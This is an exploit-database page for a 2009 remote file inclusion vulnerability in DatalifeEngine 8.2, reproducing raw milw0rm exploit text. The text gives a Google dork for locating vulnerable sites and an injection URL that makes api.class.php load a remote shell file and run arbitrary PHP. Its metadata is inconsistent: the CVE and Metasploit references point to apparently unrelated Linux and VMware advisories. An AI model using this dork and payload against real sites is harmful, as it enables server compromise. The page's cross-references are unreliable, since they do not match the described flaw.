header-logo
Suggest Exploit
vendor:
DatalifeEngine
by:
Kurdish Hackers Team
7,5
CVSS
HIGH
Remote File Inclusion
98
CWE
Product Name: DatalifeEngine
Affected Version From: 8.2
Affected Version To: 8.2
Patch Exists: YES
Related CWE: CVE-2009-3286
CPE: a:datalifeengine:datalife_engine:8.2
Metasploit: https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2009-1692/https://www.rapid7.com/db/vulnerabilities/vmsa-2010-0009-1-service-console-update-cve-2009-3286/https://www.rapid7.com/db/vulnerabilities/suse-cve-2009-3286/https://www.rapid7.com/db/vulnerabilities/centos_linux-cve-2009-3286/
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2009

DatalifeEngine 8.2 Remote File Inclusion Vulnerability

DatalifeEngine 8.2 is prone to a remote file inclusion vulnerability because it fails to properly sanitize user-supplied input. An attacker can exploit this issue to execute arbitrary PHP code within the context of the vulnerable application.

Mitigation:

Upgrade to the latest version of DatalifeEngine 8.2
Source

Exploit-DB raw data:

======================================================
DatalifeEngine 8.2 Remote File Inclusion Vulnerability
 
<<!>> Found by  :  kurdish hackers team
<<!>> C0ntact : pshela [at] YaHoo .com
                  
<<!>> Groups : Kurd-Team
<<!>> site   : www.kurdteam.org
=======================================================
+++++++++++++++++++ Script information+++++++++++++++++
=======================================================
<<->> script   :: DatalifeEngine8.2
<<->> home script :: http://dlecms.com/download/DatalifeEngine8.2.zip
=======================================================
+++++++++++++++++++++++ Exploit +++++++++++++++++++++++
=======================================================
<<->> google dork : Powered By DataLife Engine
<<->> Exploit ::
 
 >>> www.site/path /engine/api/api.class.php?dle_config_api=[shell.txt?]
 
 
=======================================================
 
=======================================================
<<->> All freinds , Zryan_kurd , RootSyS all member kurdish hackers team

# milw0rm.com [2009-09-01]

Navigation

Suggest Exploit

Services By CQR